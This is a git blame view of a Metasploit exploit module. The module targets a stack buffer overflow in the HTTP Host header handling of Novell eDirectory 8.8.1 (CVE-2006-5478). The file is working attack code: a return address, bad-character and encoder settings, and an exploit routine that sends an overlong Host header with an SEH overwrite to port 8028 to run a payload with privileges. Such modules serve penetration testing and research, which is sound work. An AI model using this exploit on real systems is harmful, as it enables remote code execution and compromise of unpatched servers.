Files
metasploit-gs/modules/exploits/windows/http/edirectory_host.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

69 lines
1.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = GreatRanking
2006-10-27 14:25:42 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
2006-10-27 14:25:42 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory NDS Server Host Header Overflow',
'Description' => %q{
2010-05-09 17:45:00 +00:00
This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
The web interface does not validate the length of the
HTTP Host header prior to using the value of that header in an
2006-10-27 14:25:42 +00:00
HTTP redirect.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
2006-10-27 14:25:42 +00:00
['CVE', '2006-5478'],
['OSVDB', '29993'],
2006-10-27 14:25:42 +00:00
['BID', '20655'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
2006-10-27 14:25:42 +00:00
],
'Privileged' => true,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2006-10-21',
2006-10-27 14:25:42 +00:00
'DefaultTarget' => 0))
register_options([Opt::RPORT(8028)])
2006-10-27 14:25:42 +00:00
end
def exploit
connect
sploit = "GET /nds HTTP/1.1" + "\r\n"
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
2006-10-27 14:25:42 +00:00
seh = generate_seh_payload(target.ret)
sploit[705, seh.length] = seh
sploit << "\r\n\r\n"
print_status("Trying target #{target.name}...")
sock.put(sploit)
2006-10-27 14:25:42 +00:00
handler
disconnect
end
2009-07-16 16:02:24 +00:00
end